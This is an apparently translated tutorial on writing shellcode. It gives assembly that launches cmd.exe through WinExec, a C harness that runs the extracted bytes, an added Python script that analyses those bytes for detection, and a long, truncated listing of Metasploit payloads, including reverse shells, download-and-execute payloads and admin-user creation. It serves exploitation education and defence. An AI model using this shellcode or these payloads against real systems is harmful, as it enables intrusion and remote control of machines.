Binary code generation and testing
Purpose of this article:
Learn shellcode programming
What is shellcode
Origin of shellcode:
In 1996, Aleph One published the famous paper "Smashing the Stack for Fun and Profit" in Underground, which describes in detail the layout of the stack on Linux and how to exploit stack-based buffer overflows. In this landmark paper, Aleph One demonstrated how to plant a piece of code into a process in order to obtain a shell, and called the planted code "shellcode".
Later, shellcode simply became the standard term for any code planted into a process in a buffer-overflow attack.
Simply put, shellcode is a piece of binary code that performs some specific function. What it does is up to the attacker: it may open a new shell, download a particular program, return a shell to the attacker, and so on.
Because shellcode manipulates registers and system calls directly, it is usually produced by writing the program in a high-level language, compiling it and disassembling the result to obtain the hexadecimal opcodes; one can also write the assembly directly and extract the opcodes from the compiled binary. Its content and length are often subject to strict constraints, so developing and debugging shellcode is difficult.
Developing shellcode in C
#include "stdafx.h"

// Builds the string "cmd.exe" on the stack one byte at a time and calls
// WinExec("cmd.exe", SW_SHOWNORMAL). MSVC inline assembly, 32-bit build.
int main(int argc, char* argv[])
{
    __asm {
        push ebp
        mov ebp, esp
        xor edi, edi
        push edi                        // four zero bytes: NUL terminator at [ebp-4..ebp-1]
        sub esp, 04h                    // room for the 7 characters at [ebp-8..ebp-2]
        mov byte ptr [ebp-08h], 63h     // 'c'  (byte ptr: MSVC needs the operand size)
        mov byte ptr [ebp-07h], 6Dh     // 'm'
        mov byte ptr [ebp-06h], 64h     // 'd'
        mov byte ptr [ebp-05h], 2Eh     // '.'
        mov byte ptr [ebp-04h], 65h     // 'e'
        mov byte ptr [ebp-03h], 78h     // 'x'
        mov byte ptr [ebp-02h], 65h     // 'e'
        push 1                          // uCmdShow = SW_SHOWNORMAL
        lea eax, [ebp-08h]
        push eax                        // lpCmdLine = "cmd.exe"
        mov edx, 0x751f3231             // address of kernel32!WinExec on the author's machine;
                                        // it differs between Windows builds and with ASLR
        call edx                        // stdcall: WinExec removes its own arguments
        leave                           // tear down the frame set up above
    };
    return 0;
}
The code above implements WinExec("cmd.exe") in assembly. Set a breakpoint and start debugging.
Right-click and choose Go To Disassembly.
The machine code corresponding to each instruction is now visible.
Copy it into Notepad++,
then extract the machine-code bytes and convert them into hexadecimal string form.
To test whether the generated shellcode works, use the following code:
#include "stdafx.h"
#include <stdio.h>

// Machine code extracted from the disassembly above (51 bytes).
unsigned char WinExec[] =
"\x55\x8B\xEC\x33\xFF\x57\x83\xEC\x04\xC6\x45"
"\xF8\x63\xC6\x45\xF9\x6D\xC6\x45\xFA\x64\xC6"
"\x45\xFB\x2E\xC6\x45\xFC\x65\xC6\x45\xFD\x78"
"\xC6\x45\xFE\x65\x6A\x01\x8D\x45\xF8\x50\xBA"
"\x31\x32\x1F\x75"
"\xFF\xD2\xC9";

int main(int argc, char **argv)
{
    // Transfer control into the byte array: push its address and "return" to it.
    // The array lives in a writable, non-executable data section, so on a system
    // with DEP enabled this faults unless the memory is made executable first.
    // The bytes end with 'leave' and no 'ret', so after WinExec returns there is
    // no clean path back into main; this is throwaway test scaffolding only.
    __asm
    {
        lea eax, WinExec
        push eax
        ret
    }
    return 0;
}
After running it, the result is as shown below:
The code executes.
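It is worth looking at the same 51 bytes the way an analyst or a detection rule sees them. The following Python script is an added example, not code from the original page: it takes the page's own byte string, reconstructs the string that the code assembles on the stack one byte at a time (the `C6 45 disp8 imm8` pattern, i.e. `mov byte ptr [ebp+disp8], imm8`), and pulls out the absolute address loaded into edx before `call edx`. The decoding assumes ordinary 32-bit x86 encodings and is a linear byte scan, not a full disassembler. The point it makes: a plain search for "cmd.exe" in the bytes finds nothing, while the reconstruction recovers it, and the hard-coded call target is exactly what ties the code to one DLL load address.

```python
"""Static analysis of the WinExec shellcode tested above.  Added example,
not code from the page; the bytes are the page's own."""
import struct

# The page's shellcode, converted from the C string literal to a bytes object.
WINEXEC_SHELLCODE = bytes.fromhex(
    "558BEC33FF5783EC04C645F863C645F96DC645FA64C645FB2EC645FC65C645FD78"
    "C645FE656A018D45F850BA31321F75FFD2C9"
)


def recover_stack_strings(code: bytes) -> list:
    """Collect every 'C6 45 disp8 imm8' (mov byte ptr [ebp+disp8], imm8),
    order the written bytes by displacement and split at gaps, so that
    strings assembled on the stack one byte at a time reappear."""
    cells = {}
    i = 0
    while i + 3 < len(code):
        if code[i] == 0xC6 and code[i + 1] == 0x45:
            disp = struct.unpack("<b", code[i + 2:i + 3])[0]  # signed 8-bit
            cells[disp] = code[i + 3]
            i += 4
        else:
            i += 1
    strings, current, prev = [], bytearray(), None
    for disp in sorted(cells):
        if prev is not None and disp != prev + 1:  # gap: a new string starts
            strings.append(current.decode("latin-1"))
            current = bytearray()
        current.append(cells[disp])
        prev = disp
    if current:
        strings.append(current.decode("latin-1"))
    return strings


def hardcoded_call_targets(code: bytes) -> list:
    """Find 'BA imm32' (mov edx, imm32) directly followed by 'FF D2'
    (call edx): an absolute address baked into the code."""
    targets = []
    for i in range(len(code) - 6):
        if code[i] == 0xBA and code[i + 5:i + 7] == b"\xFF\xD2":
            targets.append(struct.unpack("<I", code[i + 1:i + 5])[0])
    return targets


def summarize(code: bytes) -> dict:
    """What a reviewer wants to know before trusting a string-based rule."""
    return {
        "length": len(code),
        "literal_cmd_exe_present": b"cmd.exe" in code,  # plain search misses it
        "stack_strings": recover_stack_strings(code),   # reconstruction finds it
        "call_targets": [hex(t) for t in hardcoded_call_targets(code)],
    }


if __name__ == "__main__":
    print(summarize(WINEXEC_SHELLCODE))
```

A linear scan like this can misalign on real-world code (a `C6 45` pair can occur inside another instruction's immediate), so a production rule would decode instruction boundaries properly; for the 51 bytes on this page the scan is exact.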
Generating shellcode with msf
Check that msfpayload is installed
root@bt:~# which msfpayload
/usr/local/bin/msfpayload
View the help
root@bt:~# msfpayload -h
Usage: /opt/metasploit/msf3/msfpayload [<options>] <payload> [var=val] <[S]ummary|C|Cs[H]arp|[P]erl|Rub[Y]|[R]aw|[J]s|e[X]e|[D]ll|[V]BA|[W]ar|Pytho[N]>
OPTIONS:
-h Help banner
-l List available payloads
List all available payloads. There are 310 in total, for different systems and purposes, such as popping up a dialog box, executing a command, reverse connections and so on.
root@bt:~# msfpayload -l
Framework Payloads (310 total)
==============================
Name Description
---- -----------
aix/ppc/shell_bind_tcp Listen for a connection and spawn a command shell
aix/ppc/shell_find_port Spawn a shell on an established connection
aix/ppc/shell_interact Simply execve /bin/sh (for inetd programs)
aix/ppc/shell_reverse_tcp Connect back to attacker and spawn a command shell
android/meterpreter/reverse_tcp Connect back stager, Run a meterpreter server on Android
android/shell/reverse_tcp Connect back stager, Spawn a piped command shell (sh)
bsd/sparc/shell_bind_tcp Listen for a connection and spawn a command shell
bsd/sparc/shell_reverse_tcp Connect back to attacker and spawn a command shell
bsd/x86/exec Execute an arbitrary command
bsd/x86/metsvc_bind_tcp Stub payload for interacting with a Meterpreter Service
bsd/x86/metsvc_reverse_tcp Stub payload for interacting with a Meterpreter Service
bsd/x86/shell/bind_ipv6_tcp Listen for a connection over IPv6, Spawn a command shell (staged)
bsd/x86/shell/bind_tcp Listen for a connection, Spawn a command shell (staged)
bsd/x86/shell/find_tag Use an established connection, Spawn a command shell (staged)
bsd/x86/shell/reverse_ipv6_tcp Connect back to the attacker over IPv6, Spawn a command shell (staged)
bsd/x86/shell/reverse_tcp Connect back to the attacker, Spawn a command shell (staged)
bsd/x86/shell_bind_tcp Listen for a connection and spawn a command shell
bsd/x86/shell_bind_tcp_ipv6 Listen for a connection and spawn a command shell over IPv6
bsd/x86/shell_find_port Spawn a shell on an established connection
bsd/x86/shell_find_tag Spawn a shell on an established connection (proxy/nat safe)
bsd/x86/shell_reverse_tcp Connect back to attacker and spawn a command shell
bsd/x86/shell_reverse_tcp_ipv6 Connect back to attacker and spawn a command shell over IPv6
bsdi/x86/shell/bind_tcp Listen for a connection, Spawn a command shell (staged)
bsdi/x86/shell/reverse_tcp Connect back to the attacker, Spawn a command shell (staged)
bsdi/x86/shell_bind_tcp Listen for a connection and spawn a command shell
bsdi/x86/shell_find_port Spawn a shell on an established connection
bsdi/x86/shell_reverse_tcp Connect back to attacker and spawn a command shell
cmd/unix/bind_awk Listen for a connection and spawn a command shell via GNU AWK
cmd/unix/bind_inetd Listen for a connection and spawn a command shell (persistent)
cmd/unix/bind_netcat Listen for a connection and spawn a command shell via netcat
cmd/unix/bind_netcat_gaping Listen for a connection and spawn a command shell via netcat
cmd/unix/bind_netcat_gaping_ipv6 Listen for a connection and spawn a command shell via netcat
cmd/unix/bind_perl Listen for a connection and spawn a command shell via perl
cmd/unix/bind_perl_ipv6 Listen for a connection and spawn a command shell via perl
cmd/unix/bind_ruby Continually listen for a connection and spawn a command shell via Ruby
cmd/unix/bind_ruby_ipv6 Continually listen for a connection and spawn a command shell via Ruby
cmd/unix/bind_zsh
Listen for a connection and spawn a command shell via Zsh. Note: Although Zsh is
often available, please be aware it isn't usually installed by default.
cmd/unix/generic Executes the supplied command
cmd/unix/interact Interacts with a shell on an established socket connection
cmd/unix/reverse Creates an interactive shell through two inbound connections
cmd/unix/reverse_awk Creates an interactive shell via GNU AWK
cmd/unix/reverse_bash
Creates an interactive shell via bash's builtin /dev/tcp.
This will not work on most Debian-based Linux distributions
(including Ubuntu) because they compile bash without the
/dev/tcp feature.
cmd/unix/reverse_bash_telnet_ssl
Creates an interactive shell via mknod and telnet.
This method works on Debian and other systems compiled
without /dev/tcp support. This module uses the '-z'
option included on some systems to encrypt using SSL.
cmd/unix/reverse_netcat Creates an interactive shell via netcat
cmd/unix/reverse_netcat_gaping Creates an interactive shell via netcat
cmd/unix/reverse_openssl Creates an interactive shell through two inbound connections
cmd/unix/reverse_perl Creates an interactive shell via perl
cmd/unix/reverse_perl_ssl Creates an interactive shell via perl, uses SSL
cmd/unix/reverse_php_ssl Creates an interactive shell via php, uses SSL
cmd/unix/reverse_python Connect back and create a command shell via Python
cmd/unix/reverse_python_ssl Creates an interactive shell via python, uses SSL, encodes with base64 by design.
cmd/unix/reverse_ruby Connect back and create a command shell via Ruby
cmd/unix/reverse_ruby_ssl Connect back and create a command shell via Ruby, uses SSL
cmd/unix/reverse_ssl_double_telnet Creates an interactive shell through two inbound connections, encrypts using SSL via "-z" option
cmd/unix/reverse_zsh
Connect back and create a command shell via Zsh. Note: Although Zsh is often
available, please be aware it isn't usually installed by default.
cmd/windows/adduser
Create a new user and add them to local administration group.
Note: The specified password is checked for common complexity
requirements to prevent the target machine rejecting the user
for failing to meet policy requirements.
Complexity check: 8-14 chars (1 UPPER, 1 lower, 1 digit/special)
cmd/windows/bind_perl Listen for a connection and spawn a command shell via perl (persistent)
cmd/windows/bind_perl_ipv6 Listen for a connection and spawn a command shell via perl (persistent)
cmd/windows/bind_ruby Continually listen for a connection and spawn a command shell via Ruby
cmd/windows/download_eval_vbs Downloads a file from an HTTP(S) URL and executes it as a vbs script.
Use it to stage a vbs encoded payload from a short command line.
cmd/windows/download_exec_vbs Download an EXE from an HTTP(S) URL and execute it
cmd/windows/reverse_perl Creates an interactive shell via perl
cmd/windows/reverse_ruby Connect back and create a command shell via Ruby
generic/custom Use custom string or file as payload. Set either PAYLOADFILE or
PAYLOADSTR.
generic/debug_trap Generate a debug trap in the target process
generic/shell_bind_tcp Listen for a connection and spawn a command shell
generic/shell_reverse_tcp Connect back to attacker and spawn a command shell
generic/tight_loop Generate a tight loop in the target process
java/jsp_shell_bind_tcp Listen for a connection and spawn a command shell
java/jsp_shell_reverse_tcp Connect back to attacker and spawn a command shell
java/meterpreter/bind_tcp Listen for a connection, Run a meterpreter server in Java
java/meterpreter/reverse_http Tunnel communication over HTTP, Run a meterpreter server in Java
java/meterpreter/reverse_https Tunnel communication over HTTPS, Run a meterpreter server in Java
java/meterpreter/reverse_tcp Connect back stager, Run a meterpreter server in Java
java/shell/bind_tcp Listen for a connection, Spawn a piped command shell (cmd.exe on Windows, /bin/sh everywhere else)
java/shell/reverse_tcp Connect back stager, Spawn a piped command shell (cmd.exe on Windows, /bin/sh everywhere else)
java/shell_reverse_tcp Connect back to attacker and spawn a command shell
linux/armle/adduser Create a new user with UID 0
linux/armle/exec Execute an arbitrary command
linux/armle/shell/bind_tcp Listen for a connection, dup2 socket in r12, then execve
linux/armle/shell/reverse_tcp Connect back to the attacker, dup2 socket in r12, then execve
linux/armle/shell_bind_tcp Connect to target and spawn a command shell
linux/armle/shell_reverse_tcp Connect back to attacker and spawn a command shell
linux/mipsbe/shell_reverse_tcp Connect back to attacker and spawn a command shell
linux/mipsle/shell_bind_tcp Listen for a connection and spawn a command shell
linux/mipsle/shell_reverse_tcp Connect back to attacker and spawn a command shell
linux/ppc/shell_bind_tcp Listen for a connection and spawn a command shell
linux/ppc/shell_find_port Spawn a shell on an established connection
linux/ppc/shell_reverse_tcp Connect back to attacker and spawn a command shell
linux/ppc64/shell_bind_tcp Listen for a connection and spawn a command shell
linux/ppc64/shell_find_port Spawn a shell on an established connection
linux/ppc64/shell_reverse_tcp Connect back to attacker and spawn a command shell
linux/x64/exec Execute an arbitrary command
linux/x64/shell/bind_tcp Listen for a connection, Spawn a command shell (staged)
linux/x64/shell/reverse_tcp Connect back to the attacker, Spawn a command shell (staged)
linux/x64/shell_bind_tcp Listen for a connection and spawn a command shell
linux/x64/shell_find_port Spawn a shell on an established connection
linux/x64/shell_reverse_tcp Connect back to attacker and spawn a command shell
linux/x86/adduser Create a new user with UID 0
linux/x86/chmod Runs chmod on specified file with specified mode
linux/x86/exec Execute an arbitrary command
linux/x86/meterpreter/bind_ipv6_tcp Listen for a connection over IPv6, Staged meterpreter server
linux/x86/meterpreter/bind_nonx_tcp Listen for a connection, Staged meterpreter server
linux/x86/meterpreter/bind_tcp Listen for a connection, Staged meterpreter server
linux/x86/meterpreter/find_tag Use an established connection, Staged meterpreter server
linux/x86/meterpreter/reverse_ipv6_tcp Connect back to attacker over IPv6, Staged meterpreter server
linux/x86/meterpreter/reverse_nonx_tcp Connect back to the attacker, Staged meterpreter server
linux/x86/meterpreter/reverse_tcp Connect back to the attacker, Staged meterpreter server
linux/x86/metsvc_bind_tcp Stub payload for interacting with a Meterpreter Service
linux/x86/metsvc_reverse_tcp Stub payload for interacting with a Meterpreter Service
linux/x86/read_file Read up to 4096 bytes from the local file system and write it back out to the specified file descriptor
linux/x86/shell/bind_ipv6_tcp Listen for a connection over IPv6, Spawn a command shell (staged)
linux/x86/shell/bind_nonx_tcp Listen for a connection, Spawn a command shell (staged)
linux/x86/shell/bind_tcp Listen for a connection, Spawn a command shell (staged)
linux/x86/shell/find_tag Use an established connection, Spawn a command shell (staged)
linux/x86/shell/reverse_ipv6_tcp Connect back to attacker over IPv6, Spawn a command shell (staged)
linux/x86/shell/reverse_nonx_tcp Connect back to the attacker, Spawn a command shell (staged)
linux/x86/shell/reverse_tcp Connect back to the attacker, Spawn a command shell (staged)
linux/x86/shell_bind_ipv6_tcp Listen for a connection over IPv6 and spawn a command shell
linux/x86/shell_bind_tcp Listen for a connection and spawn a command shell
linux/x86/shell_find_port Spawn a shell on an established connection
linux/x86/shell_find_tag Spawn a shell on an established connection (proxy/nat safe)
linux/x86/shell_reverse_tcp Connect back to attacker and spawn a command shell
linux/x86/shell_reverse_tcp2 Connect back to attacker and spawn a command shell
netware/shell/reverse_tcp Connect back to the attacker, Connect to the NetWare console (staged)
osx/armle/execute/bind_tcp Listen for a connection, Spawn a command shell (staged)
osx/armle/execute/reverse_tcp Connect back to the attacker, Spawn a command shell (staged)
osx/armle/shell/bind_tcp Listen for a connection, Spawn a command shell (staged)
osx/armle/shell/reverse_tcp Connect back to the attacker, Spawn a command shell (staged)
osx/armle/shell_bind_tcp Listen for a connection and spawn a command shell
osx/armle/shell_reverse_tcp Connect back to attacker and spawn a command shell
osx/armle/vibrate
Causes the iPhone to vibrate, only works when the AudioToolkit library has been loaded.
Based on work by Charlie Miller <cmiller[at]securityevaluators.com>.
osx/ppc/shell/bind_tcp Listen for a connection, Spawn a command shell (staged)
osx/ppc/shell/find_tag Use an established connection, Spawn a command shell (staged)
osx/ppc/shell/reverse_tcp Connect back to the attacker, Spawn a command shell (staged)
osx/ppc/shell_bind_tcp Listen for a connection and spawn a command shell
osx/ppc/shell_reverse_tcp Connect back to attacker and spawn a command shell
osx/x64/dupandexecve/bind_tcp Listen, read length, read buffer, execute, dup2 socket in edi, then execve
osx/x64/dupandexecve/reverse_tcp Connect, read length, read buffer, execute, dup2 socket in edi, then execve
osx/x64/exec Execute an arbitrary command
osx/x64/say Say an arbitrary string outloud using Mac OS X text2speech
osx/x64/shell_bind_tcp Bind an arbitrary command to an arbitrary port
osx/x64/shell_find_tag Spawn a shell on an established connection (proxy/nat safe)
osx/x64/shell_reverse_tcp Connect back to attacker and spawn a command shell
osx/x86/bundleinject/bind_tcp Listen, read length, read buffer, execute, Inject a custom Mach-O bundle into the exploited process
osx/x86/bundleinject/reverse_tcp Connect, read length, read buffer, execute, Inject a custom Mach-O bundle into the exploited process
osx/x86/exec Execute an arbitrary command
osx/x86/isight/bind_tcp Listen, read length, read buffer, execute, Inject a Mach-O bundle to capture a photo from the iSight (staged)
osx/x86/isight/reverse_tcp Connect, read length, read buffer, execute, Inject a Mach-O bundle to capture a photo from the iSight (staged)
osx/x86/shell_bind_tcp Listen for a connection and spawn a command shell
osx/x86/shell_find_port Spawn a shell on an established connection
osx/x86/shell_reverse_tcp Connect back to attacker and spawn a command shell
osx/x86/vforkshell/bind_tcp Listen, read length, read buffer, execute, Call vfork() if necessary and spawn a command shell (staged)
osx/x86/vforkshell/reverse_tcp Connect, read length, read buffer, execute, Call vfork() if necessary and spawn a command shell (staged)
osx/x86/vforkshell_bind_tcp Listen for a connection, vfork if necessary, and spawn a command shell
osx/x86/vforkshell_reverse_tcp Connect back to attacker, vfork if necessary, and spawn a command shell
php/bind_perl Listen for a connection and spawn a command shell via perl (persistent)
php/bind_perl_ipv6 Listen for a connection and spawn a command shell via perl (persistent) over IPv6
php/bind_php Listen for a connection and spawn a command shell via php
php/bind_php_ipv6 Listen for a connection and spawn a command shell via php (IPv6)
php/download_exec Download an EXE from an HTTP URL and execute it
php/exec Execute a single system command
php/meterpreter/bind_tcp Listen for a connection, Run a meterpreter server in PHP
php/meterpreter/bind_tcp_ipv6 Listen for a connection over IPv6, Run a meterpreter server in PHP
php/meterpreter/reverse_tcp Reverse PHP connect back stager with checks for disabled functions, Run a meterpreter server in PHP
php/meterpreter_reverse_tcp Connect back to attacker and spawn a Meterpreter server (PHP)
php/reverse_perl Creates an interactive shell via perl
php/reverse_php Reverse PHP connect back shell with checks for disabled functions
php/shell_findsock
Spawn a shell on the established connection to
the webserver. Unfortunately, this payload
can leave conspicuous evil-looking entries in the
apache error logs, so it is probably a good idea
to use a bind or reverse shell unless firewalls
prevent them from working. The issue this
payload takes advantage of (CLOEXEC flag not set
on sockets) appears to have been patched on the
Ubuntu version of Apache and may not work on
other Debian-based distributions. Only tested on
Apache but it might work on other web servers
that leak file descriptors to child processes.
python/shell_reverse_tcp_ssl Creates an interactive shell via python, uses SSL, encodes with base64 by design.
ruby/shell_bind_tcp Continually listen for a connection and spawn a command shell via Ruby
ruby/shell_bind_tcp_ipv6 Continually listen for a connection and spawn a command shell via Ruby
ruby/shell_reverse_tcp Connect back and create a command shell via Ruby
ruby/shell_reverse_tcp_ssl Connect back and create a command shell via Ruby, uses SSL
solaris/sparc/shell_bind_tcp Listen for a connection and spawn a command shell
solaris/sparc/shell_find_port Spawn a shell on an established connection
solaris/sparc/shell_reverse_tcp Connect back to attacker and spawn a command shell
solaris/x86/shell_bind_tcp Listen for a connection and spawn a command shell
solaris/x86/shell_find_port Spawn a shell on an established connection
solaris/x86/shell_reverse_tcp Connect back to attacker and spawn a command shell
tty/unix/interact Interacts with a TTY on an established socket connection
windows/adduser
Create a new user and add them to local administration group.
Note: The specified password is checked for common complexity
requirements to prevent the target machine rejecting the user
for failing to meet policy requirements.
Complexity check: 8-14 chars (1 UPPER, 1 lower, 1 digit/special)
windows/dllinject/bind_ipv6_tcp Listen for a connection over IPv6, Inject a DLL via a reflective loader
windows/dllinject/bind_nonx_tcp Listen for a connection (No NX), Inject a DLL via a reflective loader
windows/dllinject/bind_tcp Listen for a connection, Inject a DLL via a reflective loader
windows/dllinject/bind_tcp_rc4 Listen for a connection, Inject a DLL via a reflective loader
windows/dllinject/find_tag Use an established connection, Inject a DLL via a reflective loader
windows/dllinject/reverse_http Tunnel communication over HTTP, Inject a DLL via a reflective loader
windows/dllinject/reverse_ipv6_http Tunnel communication over HTTP and IPv6, Inject a DLL via a reflective loader
windows/dllinject/reverse_ipv6_tcp Connect back to the attacker over IPv6, Inject a DLL via a reflective loader
windows/dllinject/reverse_nonx_tcp Connect back to the attacker (No NX), Inject a DLL via a reflective loader
windows/dllinject/reverse_ord_tcp Connect back to the attacker, Inject a DLL via a reflective loader
windows/dllinject/reverse_tcp Connect back to the attacker, Inject a DLL via a reflective loader
windows/dllinject/reverse_tcp_allports Try to connect back to the attacker, on all possible ports (1-65535, slowly), Inject a DLL via a reflective loader
windows/dllinject/reverse_tcp_dns Connect back to the attacker, Inject a DLL via a reflective loader
windows/dllinject/reverse_tcp_rc4 Connect back to the attacker, Inject a DLL via a reflective loader
windows/dllinject/reverse_tcp_rc4_dns Connect back to the attacker, Inject a DLL via a reflective loader
windows/dns_txt_query_exec Performs a TXT query against a series of DNS record(s) and executes the returned payload
windows/download_exec Download an EXE from an HTTP(S)/FTP URL and execute it
windows/exec Execute an arbitrary command
windows/loadlibrary Load an arbitrary library path
windows/messagebox Spawns a dialog via MessageBox using a customizable title, text & icon
windows/meterpreter/bind_ipv6_tcp Listen for a connection over IPv6, Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged)
windows/meterpreter/bind_nonx_tcp Listen for a connection (No NX), Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged)
windows/meterpreter/bind_tcp Listen for a connection, Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged)
windows/meterpreter/bind_tcp_rc4 Listen for a connection, Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged)
windows/meterpreter/find_tag Use an established connection, Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged)
windows/meterpreter/reverse_http Tunnel communication over HTTP, Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged)
windows/meterpreter/reverse_https Tunnel communication over HTTP using SSL, Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged)
windows/meterpreter/reverse_https_proxy Tunnel communication over HTTP using SSL with custom proxy support, Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged)
windows/meterpreter/reverse_ipv6_http Tunnel communication over HTTP and IPv6, Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged)
windows/meterpreter/reverse_ipv6_https Tunnel communication over HTTP using SSL and IPv6, Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged)
windows/meterpreter/reverse_ipv6_tcp Connect back to the attacker over IPv6, Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged)
windows/meterpreter/reverse_nonx_tcp Connect back to the attacker (No NX), Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged)
windows/meterpreter/reverse_ord_tcp Connect back to the attacker, Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged)
windows/meterpreter/reverse_tcp Connect back to the attacker, Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged)
windows/meterpreter/reverse_tcp_allports Try to connect back to the attacker, on all possible ports (1-65535, slowly), Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged)
windows/meterpreter/reverse_tcp_dns Connect back to the attacker, Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged)
windows/meterpreter/reverse_tcp_rc4 Connect back to the attacker, Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged)
windows/meterpreter/reverse_tcp_rc4_dns Connect back to the attacker, Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged)
windows/metsvc_bind_tcp Stub payload for interacting with a Meterpreter Service
windows/metsvc_reverse_tcp Stub payload for interacting with a Meterpreter Service
windows/patchupdllinject/bind_ipv6_tcp Listen for a connection over IPv6, Inject a custom DLL into the exploited process
windows/patchupdllinject/bind_nonx_tcp Listen for a connection (No NX), Inject a custom DLL into the exploited process
windows/patchupdllinject/bind_tcp Listen for a connection, Inject a custom DLL into the exploited process
windows/patchupdllinject/bind_tcp_rc4 Listen for a connection, Inject a custom DLL into the exploited process
windows/patchupdllinject/find_tag Use an established connection, Inject a custom DLL into the exploited process
windows/patchupdllinject/reverse_ipv6_tcp Connect back to the attacker over IPv6, Inject a custom DLL into the exploited process
windows/patchupdllinject/reverse_nonx_tcp Connect back to the attacker (No NX), Inject a custom DLL into the exploited process
windows/patchupdllinject/reverse_ord_tcp Connect back to the attacker, Inject a custom DLL into the exploited process
windows/patchupdllinject/reverse_tcp Connect back to the attacker, Inject a custom DLL into the exploited process
windows/patchupdllinject/reverse_tcp_allports Try to connect back to the attacker, on all possible ports (1-65535, slowly), Inject a custom DLL into the exploited process
windows/patchupdllinject/reverse_tcp_dns Connect back to the attacker, Inject a custom DLL into the exploited process
windows/patchupdllinject/reverse_tcp_rc4 Connect back to the attacker, Inject a custom DLL into the exploited process
windows/patchupdllinject/reverse_tcp_rc4_dns Connect back to the attacker, Inject a custom DLL into the exploited process
windows/patchupmeterpreter/bind_ipv6_tcp Listen for a connection over IPv6, Inject the meterpreter server DLL (staged)
windows/patchupmeterpreter/bind_nonx_tcp Listen for a connection (No NX), Inject the meterpreter server DLL (staged)
windows/patchupmeterpreter/bind_tcp Listen for a connection, Inject the meterpreter server DLL (staged)
windows/patchupmeterpreter/bind_tcp_rc4 Listen for a connection, Inject the meterpreter server DLL (staged)
windows/patchupmeterpreter/find_tag Use an established connection, Inject the meterpreter server DLL (staged)
windows/patchupmeterpreter/reverse_ipv6_tcp Connect back to the attacker over IPv6, Inject the meterpreter server DLL (staged)
windows/patchupmeterpreter/reverse_nonx_tcp Connect back to the attacker (No NX), Inject the meterpreter server DLL (staged)
windows/patchupmeterpreter/reverse_ord_tcp Connect back to the attacker, Inject the meterpreter server DLL (staged)
windows/patchupmeterpreter/reverse_tcp Connect back to the attacker, Inject the meterpreter server DLL (staged)
windows/patchupmeterpreter/reverse_tcp_allports Try to connect back to the attacker, on all possible ports (1-65535, slowly), Inject the meterpreter server DLL (staged)
windows/patchupmeterpreter/reverse_tcp_dns Connect back to the attacker, Inject the meterpreter server DLL (staged)
windows/patchupmeterpreter/reverse_tcp_rc4 Connect back to the attacker, Inject the meterpreter server DLL (staged)
windows/patchupmeterpreter/reverse_tcp_rc4_dns Connect back to the attacker, Inject the meterpreter server DLL (staged)
windows/shell/bind_ipv6_tcp Listen for a connection over IPv6, Spawn a piped command shell (staged)
windows/shell/bind_nonx_tcp Listen for a connection (No NX), Spawn a piped command shell (staged)
windows/shell/bind_tcp Listen for a connection, Spawn a piped command shell (staged)
windows/shell/bind_tcp_rc4 Listen for a connection, Spawn a piped command shell (staged)
windows/shell/find_tag Use an established connection, Spawn a piped command shell (staged)
windows/shell/reverse_http Tunnel communication over HTTP, Spawn a piped command shell (staged)
windows/shell/reverse_ipv6_http Tunnel communication over HTTP and IPv6, Spawn a piped command shell (staged)
windows/shell/reverse_ipv6_tcp Connect back to the attacker over IPv6, Spawn a piped command shell (staged)
windows/shell/reverse_nonx_tcp Connect back to the attacker (No NX), Spawn a piped command shell (staged)
windows/shell/reverse_ord_tcp Connect back to the attacker, Spawn a piped command shell (staged)
windows/shell/reverse_tcp Connect back to the attacker, Spawn a piped command shell (staged)
windows/shell/reverse_tcp_allports Try to connect back to the attacker, on all possible ports (1-65535, slowly), Spawn a piped command shell (staged)
windows/shell/reverse_tcp_dns Connect back to the attacker, Spawn a piped command shell (staged)
windows/shell/reverse_tcp_rc4 Connect back to the attacker, Spawn a piped command shell (staged)
windows/shell/reverse_tcp_rc4_dns Connect back to the attacker, Spawn a piped command shell (staged)
windows/shell_bind_tcp Listen for a connection and spawn a command shell
windows/shell_bind_tcp_xpfw Disable the Windows ICF, then listen for a connection and spawn a command shell
windows/shell_reverse_tcp Connect back to attacker and spawn a command shell
windows/speak_pwned Causes the target to say "You Got Pwned" via the Windows Speech API
windows/upexec/bind_ipv6_tcp Listen for a connection over IPv6, Uploads an executable and runs it (staged)
windows/upexec/bind_nonx_tcp Listen for a connection (No NX), Uploads an executable and runs it (staged)
windows/upexec/bind_tcp Listen for a connection, Uploads an executable and runs it (staged)
windows/upexec/bind_tcp_rc4 Listen for a connection, Uploads an executable and runs it (staged)
windows/upexec/find_tag Use an established connection, Uploads an executable and runs it (staged)
windows/upexec/reverse_http Tunnel communication over HTTP, Uploads an executable and runs it (staged)
windows/upexec/reverse_ipv6_http Tunnel communication over HTTP and IPv6, Uploads an executable and runs it (staged)
windows/upexec/reverse_ipv6_tcp Connect back to the attacker over IPv6, Uploads an executable and runs it (staged)
windows/upexec/reverse_nonx_tcp Connect back to the attacker (No NX), Uploads an executable and runs it (staged)
windows/upexec/reverse_ord_tcp Connect back to the attacker, Uploads an executable and runs it (staged)
windows/upexec/reverse_tcp Connect back to the attacker, Uploads an executable and runs it (staged)
windows/upexec/reverse_tcp_allports Try to connect back to the attacker, on all possible ports (1-65535, slowly), Uploads an executable and runs it (staged)
windows/upexec/reverse_tcp_dns Connect back to the attacker, Uploads an executable and runs it (staged)
windows/upexec/reverse_tcp_rc4 Connect back to the attacker, Uploads an executable and runs it (staged)
windows/upexec/reverse_tcp_rc4_dns Connect back to the attacker, Uploads an executable and runs it (staged)
windows/vncinject/bind_ipv6_tcp Listen for a connection over IPv6, Inject a VNC Dll via a reflective loader (staged)
windows/vncinject/bind_nonx_tcp Listen for a connection (No NX), Inject a VNC Dll via a reflective loader (staged)
